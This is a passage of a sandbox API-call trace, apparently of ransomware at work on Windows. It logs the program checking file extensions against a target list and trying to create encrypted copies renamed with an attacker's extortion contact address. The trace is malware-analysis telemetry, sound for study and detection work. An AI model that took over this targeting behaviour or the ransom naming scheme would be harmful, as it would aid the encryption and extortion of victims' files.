files\\system\\ado\\adojavas.inc.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0158.234] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc" (normalized: "c:\\program files\\common files\\system\\ado\\adojavas.inc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0158.234] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc") returned 53 [0158.234] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc") returned 53 [0158.234] lstrlenW (lpString=".doc") returned 4 [0158.234] lstrcmpiW (lpString1=".doc", lpString2=".inc") returned -1 [0158.235] lstrlenW (lpString=".docx") returned 5 [0158.235] lstrcmpiW (lpString1=".docx", lpString2="s.inc") returned -1 [0158.235] lstrlenW (lpString=".pdf") returned 4 [0158.235] lstrcmpiW (lpString1=".pdf", lpString2=".inc") returned 1 [0158.235] lstrlenW (lpString=".xls") returned 4 [0158.235] lstrcmpiW (lpString1=".xls", lpString2=".inc") returned 1 [0158.235] lstrlenW (lpString=".xlsx") returned 5 [0158.235] lstrcmpiW (lpString1=".xlsx", lpString2="s.inc") returned -1 [0158.235] lstrlenW (lpString=".ppt") returned 4 [0158.235] lstrcmpiW (lpString1=".ppt", lpString2=".inc") returned 1 [0158.235] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc") returned 53 [0158.235] lstrlenW (lpString=".zip") returned 4 [0158.235] lstrcmpiW (lpString1=".zip", lpString2=".inc") returned 1 [0158.235] lstrlenW (lpString=".rar") returned 4 [0158.235] lstrcmpiW (lpString1=".rar", lpString2=".inc") returned 1 [0158.235] lstrlenW (lpString=".bz2") returned 4 [0158.235] lstrcmpiW (lpString1=".bz2", lpString2=".inc") returned -1 [0158.235] lstrlenW (lpString=".7z") returned 3 [0158.235] lstrcmpiW (lpString1=".7z", lpString2="inc") returned -1 [0158.235] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc") returned 53 [0158.235] lstrlenW (lpString=".dbf") returned 4 [0158.235] lstrcmpiW (lpString1=".dbf", lpString2=".inc") returned -1 [0158.235] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc") returned 53 [0158.235] lstrlenW (lpString=".1cd") returned 4 [0158.235] lstrcmpiW (lpString1=".1cd", lpString2=".inc") returned -1 [0158.235] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc") returned 53 [0158.235] lstrlenW (lpString=".jpg") returned 4 [0158.235] lstrcmpiW (lpString1=".jpg", lpString2=".inc") returned 1 [0158.236] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc") returned 53 [0158.236] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc") returned 53 [0158.236] lstrlenW (lpString=".doc") returned 4 [0158.236] lstrcmpiW (lpString1=".doc", lpString2=".inc") returned -1 [0158.236] lstrlenW (lpString=".docx") returned 5 [0158.236] lstrcmpiW (lpString1=".docx", lpString2="s.inc") returned -1 [0158.236] lstrlenW (lpString=".pdf") returned 4 [0158.236] lstrcmpiW (lpString1=".pdf", lpString2=".inc") returned 1 [0158.236] lstrlenW (lpString=".xls") returned 4 [0158.236] lstrcmpiW (lpString1=".xls", lpString2=".inc") returned 1 [0158.236] lstrlenW (lpString=".xlsx") returned 5 [0158.236] lstrcmpiW (lpString1=".xlsx", lpString2="s.inc") returned -1 [0158.236] lstrlenW (lpString=".ppt") returned 4 [0158.236] lstrcmpiW (lpString1=".ppt", lpString2=".inc") returned 1 [0158.236] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc") returned 53 [0158.236] lstrlenW (lpString=".zip") returned 4 [0158.236] lstrcmpiW (lpString1=".zip", lpString2=".inc") returned 1 [0158.236] lstrlenW (lpString=".rar") returned 4 [0158.236] lstrcmpiW (lpString1=".rar", lpString2=".inc") returned 1 [0158.236] lstrlenW (lpString=".bz2") returned 4 [0158.236] lstrcmpiW (lpString1=".bz2", lpString2=".inc") returned -1 [0158.236] lstrlenW (lpString=".7z") returned 3 [0158.236] lstrcmpiW (lpString1=".7z", lpString2="inc") returned -1 [0158.236] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc") returned 53 [0158.236] lstrlenW (lpString=".dbf") returned 4 [0158.236] lstrcmpiW (lpString1=".dbf", lpString2=".inc") returned -1 [0158.236] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc") returned 53 [0158.237] lstrlenW (lpString=".1cd") returned 4 [0158.237] lstrcmpiW (lpString1=".1cd", lpString2=".inc") returned -1 [0158.237] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc") returned 53 [0158.237] lstrlenW (lpString=".jpg") returned 4 [0158.237] lstrcmpiW (lpString1=".jpg", lpString2=".inc") returned 1 [0158.237] lstrcmpiW (lpString1=".inc", lpString2=".bat") returned 1 [0158.237] lstrlenW (lpString="adovbs.inc") returned 10 [0158.237] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc" (normalized: "c:\\program files\\common files\\system\\ado\\adovbs.inc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0158.238] GetFileSizeEx (in: hFile=0x414, lpFileSize=0x39fff14 | out: lpFileSize=0x39fff14*=15195) returned 1 [0158.238] CloseHandle (hObject=0x414) returned 1 [0158.238] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc" (normalized: "c:\\program files\\common files\\system\\ado\\adovbs.inc")) returned 0x20 [0158.238] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\system\\ado\\adovbs.inc.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0158.239] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc" (normalized: "c:\\program files\\common files\\system\\ado\\adovbs.inc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0158.239] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned 51 [0158.239] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned 51 [0158.239] lstrlenW (lpString=".doc") returned 4 [0158.239] lstrcmpiW (lpString1=".doc", lpString2=".inc") returned -1 [0158.239] lstrlenW (lpString=".docx") returned 5 [0158.239] lstrcmpiW (lpString1=".docx", lpString2="s.inc") returned -1 [0158.239] lstrlenW (lpString=".pdf") returned 4 [0158.239] lstrcmpiW (lpString1=".pdf", lpString2=".inc") returned 1 [0158.239] lstrlenW (lpString=".xls") returned 4 [0158.239] lstrcmpiW (lpString1=".xls", lpString2=".inc") returned 1 [0158.239] lstrlenW (lpString=".xlsx") returned 5 [0158.239] lstrcmpiW (lpString1=".xlsx", lpString2="s.inc") returned -1 [0158.239] lstrlenW (lpString=".ppt") returned 4 [0158.239] lstrcmpiW (lpString1=".ppt", lpString2=".inc") returned 1 [0158.239] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned 51 [0158.239] lstrlenW (lpString=".zip") returned 4 [0158.239] lstrcmpiW (lpString1=".zip", lpString2=".inc") returned 1 [0158.239] lstrlenW (lpString=".rar") returned 4 [0158.239] lstrcmpiW (lpString1=".rar", lpString2=".inc") returned 1 [0158.239] lstrlenW (lpString=".bz2") returned 4 [0158.239] lstrcmpiW (lpString1=".bz2", lpString2=".inc") returned -1 [0158.239] lstrlenW (lpString=".7z") returned 3 [0158.240] lstrcmpiW (lpString1=".7z", lpString2="inc") returned -1 [0158.240] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned 51 [0158.240] lstrlenW (lpString=".dbf") returned 4 [0158.240] lstrcmpiW (lpString1=".dbf", lpString2=".inc") returned -1 [0158.240] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned 51 [0158.240] lstrlenW (lpString=".1cd") returned 4 [0158.240] lstrcmpiW (lpString1=".1cd", lpString2=".inc") returned -1 [0158.240] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned 51 [0158.240] lstrlenW (lpString=".jpg") returned 4 [0158.240] lstrcmpiW (lpString1=".jpg", lpString2=".inc") returned 1 [0158.240] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned 51 [0158.240] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned 51 [0158.240] lstrlenW (lpString=".doc") returned 4 [0158.240] lstrcmpiW (lpString1=".doc", lpString2=".inc") returned -1 [0158.240] lstrlenW (lpString=".docx") returned 5 [0158.240] lstrcmpiW (lpString1=".docx", lpString2="s.inc") returned -1 [0158.240] lstrlenW (lpString=".pdf") returned 4 [0158.240] lstrcmpiW (lpString1=".pdf", lpString2=".inc") returned 1 [0158.240] lstrlenW (lpString=".xls") returned 4 [0158.240] lstrcmpiW (lpString1=".xls", lpString2=".inc") returned 1 [0158.240] lstrlenW (lpString=".xlsx") returned 5 [0158.240] lstrcmpiW (lpString1=".xlsx", lpString2="s.inc") returned -1 [0158.240] lstrlenW (lpString=".ppt") returned 4 [0158.240] lstrcmpiW (lpString1=".ppt", lpString2=".inc") returned 1 [0158.240] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned 51 [0158.240] lstrlenW (lpString=".zip") returned 4 [0158.240] lstrcmpiW (lpString1=".zip", lpString2=".inc") returned 1 [0158.241] lstrlenW (lpString=".rar") returned 4 [0158.241] lstrcmpiW (lpString1=".rar", lpString2=".inc") returned 1 [0158.241] lstrlenW (lpString=".bz2") returned 4 [0158.241] lstrcmpiW (lpString1=".bz2", lpString2=".inc") returned -1 [0158.241] lstrlenW (lpString=".7z") returned 3 [0158.241] lstrcmpiW (lpString1=".7z", lpString2="inc") returned -1 [0158.241] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned 51 [0158.241] lstrlenW (lpString=".dbf") returned 4 [0158.241] lstrcmpiW (lpString1=".dbf", lpString2=".inc") returned -1 [0158.241] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned 51 [0158.241] lstrlenW (lpString=".1cd") returned 4 [0158.241] lstrcmpiW (lpString1=".1cd", lpString2=".inc") returned -1 [0158.241] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned 51 [0158.241] lstrlenW (lpString=".jpg") returned 4 [0158.241] lstrcmpiW (lpString1=".jpg", lpString2=".inc") returned 1 [0158.241] lstrcmpiW (lpString1=".inc", lpString2=".bat") returned 1 [0158.242] lstrlenW (lpString="adcjavas.inc") returned 12 [0158.242] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc" (normalized: "c:\\program files\\common files\\system\\msadc\\adcjavas.inc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0158.243] GetFileSizeEx (in: hFile=0x414, lpFileSize=0x39fff14 | out: lpFileSize=0x39fff14*=630) returned 1 [0158.243] CloseHandle (hObject=0x414) returned 1 [0158.243] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc" (normalized: "c:\\program files\\common files\\system\\msadc\\adcjavas.inc")) returned 0x20 [0158.243] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\system\\msadc\\adcjavas.inc.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0158.243] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc" (normalized: "c:\\program files\\common files\\system\\msadc\\adcjavas.inc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0158.243] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc") returned 55 [0158.243] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc") returned 55 [0158.243] lstrlenW (lpString=".doc") returned 4 [0158.243] lstrcmpiW (lpString1=".doc", lpString2=".inc") returned -1 [0158.243] lstrlenW (lpString=".docx") returned 5 [0158.243] lstrcmpiW (lpString1=".docx", lpString2="s.inc") returned -1 [0158.243] lstrlenW (lpString=".pdf") returned 4 [0158.243] lstrcmpiW (lpString1=".pdf", lpString2=".inc") returned 1 [0158.244] lstrlenW (lpString=".xls") returned 4 [0158.244] lstrcmpiW (lpString1=".xls", lpString2=".inc") returned 1 [0158.244] lstrlenW (lpString=".xlsx") returned 5 [0158.244] lstrcmpiW (lpString1=".xlsx", lpString2="s.inc") returned -1 [0158.244] lstrlenW (lpString=".ppt") returned 4 [0158.244] lstrcmpiW (lpString1=".ppt", lpString2=".inc") returned 1 [0158.244] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc") returned 55 [0158.244] lstrlenW (lpString=".zip") returned 4 [0158.244] lstrcmpiW (lpString1=".zip", lpString2=".inc") returned 1 [0158.244] lstrlenW (lpString=".rar") returned 4 [0158.244] lstrcmpiW (lpString1=".rar", lpString2=".inc") returned 1 [0158.244] lstrlenW (lpString=".bz2") returned 4 [0158.244] lstrcmpiW (lpString1=".bz2", lpString2=".inc") returned -1 [0158.244] lstrlenW (lpString=".7z") returned 3 [0158.244] lstrcmpiW (lpString1=".7z", lpString2="inc") returned -1 [0158.244] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc") returned 55 [0158.244] lstrlenW (lpString=".dbf") returned 4 [0158.244] lstrcmpiW (lpString1=".dbf", lpString2=".inc") returned -1 [0158.244] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc") returned 55 [0158.244] lstrlenW (lpString=".1cd") returned 4 [0158.244] lstrcmpiW (lpString1=".1cd", lpString2=".inc") returned -1 [0158.244] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc") returned 55 [0158.244] lstrlenW (lpString=".jpg") returned 4 [0158.244] lstrcmpiW (lpString1=".jpg", lpString2=".inc") returned 1 [0158.244] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc") returned 55 [0158.244] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc") returned 55 [0158.244] lstrlenW (lpString=".doc") returned 4 [0158.245] lstrcmpiW (lpString1=".doc", lpString2=".inc") returned -1 [0158.245] lstrlenW (lpString=".docx") returned 5 [0158.245] lstrcmpiW (lpString1=".docx", lpString2="s.inc") returned -1 [0158.245] lstrlenW (lpString=".pdf") returned 4 [0158.245] lstrcmpiW (lpString1=".pdf", lpString2=".inc") returned 1 [0158.245] lstrlenW (lpString=".xls") returned 4 [0158.245] lstrcmpiW (lpString1=".xls", lpString2=".inc") returned 1 [0158.245] lstrlenW (lpString=".xlsx") returned 5 [0158.245] lstrcmpiW (lpString1=".xlsx", lpString2="s.inc") returned -1 [0158.245] lstrlenW (lpString=".ppt") returned 4 [0158.245] lstrcmpiW (lpString1=".ppt", lpString2=".inc") returned 1 [0158.245] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc") returned 55 [0158.245] lstrlenW (lpString=".zip") returned 4 [0158.245] lstrcmpiW (lpString1=".zip", lpString2=".inc") returned 1 [0158.245] lstrlenW (lpString=".rar") returned 4 [0158.245] lstrcmpiW (lpString1=".rar", lpString2=".inc") returned 1 [0158.245] lstrlenW (lpString=".bz2") returned 4 [0158.245] lstrcmpiW (lpString1=".bz2", lpString2=".inc") returned -1 [0158.245] lstrlenW (lpString=".7z") returned 3 [0158.245] lstrcmpiW (lpString1=".7z", lpString2="inc") returned -1 [0158.245] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc") returned 55 [0158.245] lstrlenW (lpString=".dbf") returned 4 [0158.245] lstrcmpiW (lpString1=".dbf", lpString2=".inc") returned -1 [0158.245] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc") returned 55 [0158.245] lstrlenW (lpString=".1cd") returned 4 [0158.245] lstrcmpiW (lpString1=".1cd", lpString2=".inc") returned -1 [0158.245] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc") returned 55 [0158.245] lstrlenW (lpString=".jpg") returned 4 [0158.245] lstrcmpiW (lpString1=".jpg", lpString2=".inc") returned 1 [0158.246] lstrcmpiW (lpString1=".inc", lpString2=".bat") returned 1 [0158.246] lstrlenW (lpString="adcvbs.inc") returned 10 [0158.246] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc" (normalized: "c:\\program files\\common files\\system\\msadc\\adcvbs.inc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0158.246] GetFileSizeEx (in: hFile=0x414, lpFileSize=0x39fff14 | out: lpFileSize=0x39fff14*=623) returned 1 [0158.246] CloseHandle (hObject=0x414) returned 1 [0158.247] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc" (normalized: "c:\\program files\\common files\\system\\msadc\\adcvbs.inc")) returned 0x20 [0158.247] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\system\\msadc\\adcvbs.inc.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0158.247] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc" (normalized: "c:\\program files\\common files\\system\\msadc\\adcvbs.inc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0158.247] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc") returned 53 [0158.247] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc") returned 53 [0158.247] lstrlenW (lpString=".doc") returned 4 [0158.247] lstrcmpiW (lpString1=".doc", lpString2=".inc") returned -1 [0158.247] lstrlenW (lpString=".docx") returned 5 [0158.247] lstrcmpiW (lpString1=".docx", lpString2="s.inc") returned -1 [0158.247] lstrlenW (lpString=".pdf") returned 4 [0158.247] lstrcmpiW (lpString1=".pdf", lpString2=".inc") returned 1 [0158.247] lstrlenW (lpString=".xls") returned 4 [0158.247] lstrcmpiW (lpString1=".xls", lpString2=".inc") returned 1 [0158.247] lstrlenW (lpString=".xlsx") returned 5 [0158.247] lstrcmpiW (lpString1=".xlsx", lpString2="s.inc") returned -1 [0158.247] lstrlenW (lpString=".ppt") returned 4 [0158.247] lstrcmpiW (lpString1=".ppt", lpString2=".inc") returned 1 [0158.247] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc") returned 53 [0158.247] lstrlenW (lpString=".zip") returned 4 [0158.247] lstrcmpiW (lpString1=".zip", lpString2=".inc") returned 1 [0158.247] lstrlenW (lpString=".rar") returned 4 [0158.248] lstrcmpiW (lpString1=".rar", lpString2=".inc") returned 1 [0158.248] lstrlenW (lpString=".bz2") returned 4 [0158.248] lstrcmpiW (lpString1=".bz2", lpString2=".inc") returned -1 [0158.248] lstrlenW (lpString=".7z") returned 3 [0158.248] lstrcmpiW (lpString1=".7z", lpString2="inc") returned -1 [0158.248] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc") returned 53 [0159.408] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0159.408] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0159.408] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105306.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105306.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0159.408] CloseHandle (hObject=0x430) returned 1 [0159.409] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0159.409] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0159.409] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105320.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105320.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0159.410] CloseHandle (hObject=0x430) returned 1 [0159.411] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0159.411] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0159.411] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105328.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105328.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0159.411] CloseHandle (hObject=0x430) returned 1 [0159.413] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0159.413] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0159.413] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105332.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105332.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0159.413] CloseHandle (hObject=0x430) returned 1 [0159.414] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0159.414] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0159.414] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105336.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105336.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0159.414] CloseHandle (hObject=0x430) returned 1 [0159.415] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0159.415] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0159.415] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105338.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105338.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0159.415] CloseHandle (hObject=0x430) returned 1 [0159.416] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0159.416] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0159.416] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105348.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105348.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0159.417] CloseHandle (hObject=0x430) returned 1 [0159.417] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0159.417] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0159.417] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105360.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105360.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0159.418] CloseHandle (hObject=0x430) returned 1 [0159.418] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0159.419] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0159.419] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105368.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105368.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0159.419] CloseHandle (hObject=0x430) returned 1 [0159.420] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0159.420] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0159.420] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105376.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105376.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, 